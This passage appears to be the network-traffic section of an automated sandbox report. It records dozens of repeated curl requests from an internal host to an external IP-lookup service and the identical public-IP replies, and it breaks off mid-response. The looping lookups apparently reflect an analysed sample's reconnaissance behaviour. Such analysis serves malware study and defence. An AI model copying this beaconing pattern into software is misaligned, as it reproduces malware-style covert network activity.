                                  Jul 11, 2024 08:33:56.510031939 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:56.658843994 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:56 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3d09804bd12-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  19192.168.11.2049800104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:57.275635004 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:57.423768997 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:57 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3d55997b081-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  20192.168.11.2049801104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:58.056514025 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:58.206001043 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:58 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3da3a66bd0a-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  21192.168.11.2049802104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:58.868814945 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:59.016415119 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:58 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3df4a01bfd4-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  22192.168.11.2049803104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:59.727998018 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:59.872118950 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:59 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3e4abc5bfa5-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  23192.168.11.2049804104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:00.493462086 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:00.639389038 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:00 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3e97fe3ade4-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  24192.168.11.2049805104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:01.274671078 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:01.422419071 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:01 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3ee5dd77b9c-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  25192.168.11.2049806104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:02.118150949 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:02.262888908 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:02 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3f39d3fb029-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  26192.168.11.2049807104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:02.930433035 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:03.081269026 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:03 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3f8bc511d78-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  27192.168.11.2049808104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:03.711571932 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:03.855973959 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:03 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3fd9d66bfb8-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  28192.168.11.2049809104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:04.477001905 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:04.625786066 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:04 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4025b334575-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  29192.168.11.2049810104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:05.273729086 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:05.423358917 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:05 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4075df94548-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  30192.168.11.2049811104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:06.039118052 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:06.187098026 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:06 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c40c1c1817ef-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  31192.168.11.2049812104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:06.820174932 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:06.965630054 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:06 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4110c9853b7-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  32192.168.11.2049813104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:07.601254940 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:07.746692896 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:07 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c415ea7fbcdf-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  33192.168.11.2049814104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:08.351294041 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:08.500833988 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:08 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c41a9eb644df-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  34192.168.11.2049815104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:09.132210016 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:09.285522938 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:09 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c41f7e0a452b-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  35192.168.11.2049816104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:09.890285015 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:10.038230896 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:09 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4243cbcbfa1-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  36192.168.11.2049817104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:10.663094997 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:10.814078093 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:10 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4290f1d456a-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  37192.168.11.2049818104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:11.459781885 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:11.604686975 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:11 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c42e08146768-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  38192.168.11.2049819104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:12.225199938 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:12.376631021 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:12 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c432cbe512e7-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  39192.168.11.2049820104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:13.006351948 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:13.153142929 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:13 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c437a83753ec-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  40192.168.11.2049821104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:13.849881887 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:13.997678995 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:13 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c43cfa514575-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  41192.168.11.2049822104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:14.599700928 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:14.751224041 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:14 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c44198a94503-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  42192.168.11.2049823104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:15.380837917 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:15.532730103 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:15 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c446895944d7-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  43192.168.11.2049824104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:16.146308899 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:16.296188116 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:16 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c44b4de31867-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  44192.168.11.2049825104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:16.920106888 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:17.063767910 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:17 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4502c99b029-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  45192.168.11.2049826104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:17.692800045 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:17.837390900 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:17 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c454fd50bcbc-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  46192.168.11.2049827104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:18.451410055 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:18.598345995 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:18 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c459bc3abf64-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  47192.168.11.2049828104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:19.208050966 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:19.352333069 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:19 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c45e6a09675a-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  48192.168.11.2049829104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:19.973529100 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:20.119410992 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:20 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4633c6bbccc-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  49192.168.11.2049830104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:20.754650116 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:20.898859024 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:20 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4681835bd02-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  50192.168.11.2049831104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:21.551426888 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:21.696422100 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:21 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c46d1bfead51-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  51192.168.11.2049832104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:22.332530975 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:22.477082014 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:22 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c471f94d4558-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  52192.168.11.2049833104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:23.082182884 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:23.226619959 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:23 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c476ab924526-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  53192.168.11.2049834104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:23.847672939 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:23.992547035 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:23 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c47b6a8cbd0d-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  54192.168.11.2049835104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:24.597559929 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:24.743386984 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:24 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4801f3953f8-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  55192.168.11.2049836104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:25.347563982 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:25.492796898 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:25 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c484c812b0bb-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  56192.168.11.2049837104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:26.128448009 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:26.272676945 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:26 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
